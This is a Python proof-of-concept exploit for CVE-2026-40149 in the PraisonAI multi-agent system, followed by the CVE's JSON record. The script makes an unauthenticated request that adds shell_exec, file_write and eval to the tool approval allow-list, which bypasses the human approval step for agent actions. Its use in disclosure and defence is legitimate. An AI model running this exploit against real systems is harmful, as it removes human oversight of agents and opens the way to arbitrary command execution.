CVE-2026-40149

import requests def exploit(target_url): # The endpoint to modify the allow-list endpoint = f"{target_url}/api/approval/allow-list" # Dangerous tools to add to the allow-list to bypass human approval malicious_payload = { "tools": ["shell_exec", "file_write", "eval"] } try: # Send unauthenticated POST request to modify the allowlist response = requests.post(endpoint, json=malicious_payload, timeout=10) if response.status_code == 200: print("[+] Success: Tool approval allow-list modified.") print("[+] Dangerous tools are now auto-approved.") else: print(f"[-] Failed: HTTP {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://localhost:8000" # Replace with actual target exploit(target)

{"cve": {"id": "CVE-2026-40149", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:35.750", "lastModified": "2026-04-20T19:53:38.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to 4.5.128, the gateway's /api/approval/allow-list endpoint permits unauthenticated modification of the tool approval allowlist when no auth_token is configured (the default). By adding dangerous tool names (e.g., shell_exec, file_write) to the allowlist, an attacker can cause the ExecApprovalManager to auto-approve all future agent invocations of those tools, bypassing the human-in-the-loop safety mechanism that the approval system is specifically designed to enforce. This vulnerability is fixed in 4.5.128."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N", "baseScore": 7.9, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-396"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.128", "matchCriteriaId": "56CDE5F5-B03C-4C3A-9A92-F61C9DFDA9B1"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4wr3-f4p3-5wjh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4wr3-f4p3-5wjh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}